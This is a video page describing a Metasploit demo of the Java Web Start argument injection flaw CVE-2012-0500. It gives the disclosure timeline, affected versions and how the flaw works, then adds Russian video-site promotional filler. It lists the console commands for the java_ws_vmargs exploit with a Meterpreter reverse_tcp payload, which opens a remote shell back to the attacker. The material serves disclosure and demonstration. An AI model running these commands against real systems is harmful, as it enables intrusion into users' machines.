CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo
Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Timeline :
Vulnerability "ZDI-12-037" reported by Chris Ries to ZDI
Vulnerability "ZDI-12-039" reported by Anonymous to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for "ZDI-12-037"
Vulnerability reported to the vendor by ZDI the 2011-11-21 for "ZDI-12-039"
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23
PoC provided by:
jduck
Reference(s) :
CVE-2012-0500
OSVDB-79227
TSL20120214-01
ZDI-12-037
ZDI-12-039
Oracle Java SE Critical Patch Update Advisory - February 2012
Affected versions :
Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior
Tested on Windows XP Pro SP3 Integral with :
Java 6 Update 30
Internet Explorer 8
Description :
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.
Metasploit demo :
use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
getuid
sysinfo
Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo», вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.
Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.
Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!
Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.